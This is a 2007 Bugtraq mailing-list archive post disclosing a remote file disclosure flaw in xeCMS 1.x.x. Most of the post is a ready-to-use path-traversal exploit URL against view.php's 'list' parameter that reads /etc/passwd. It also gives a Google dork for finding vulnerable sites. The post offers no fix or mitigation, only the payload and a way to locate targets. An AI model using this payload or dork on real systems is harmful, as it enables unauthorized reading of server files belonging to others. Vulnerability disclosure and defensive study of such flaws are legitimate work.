Bugtraq mailing list archives

xeCMS 1.x.x Remote File Disclosure Vulnerability.

From: p4imi0 <p4imi0 () gmail com>
Date: Wed, 19 Dec 2007 22:47:55 +0100

--------------------------------------------------------------
xeCMS 1.x.x Remote File Disclosure Vulnerability.
--------------------------------------------------------------

download    : http://xecms.sunsite.dk/
author      : p4imi0
contact     : p4imi0 () gmail com
exploit     : view.php?list=..%2F..%2F..
%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
google dork : inurl:"view.php?list=" Powered by xeCMS
thanks to   : str0ke, Cr[]w.

Current thread:

xeCMS 1.x.x Remote File Disclosure Vulnerability. p4imi0 (Dec 19)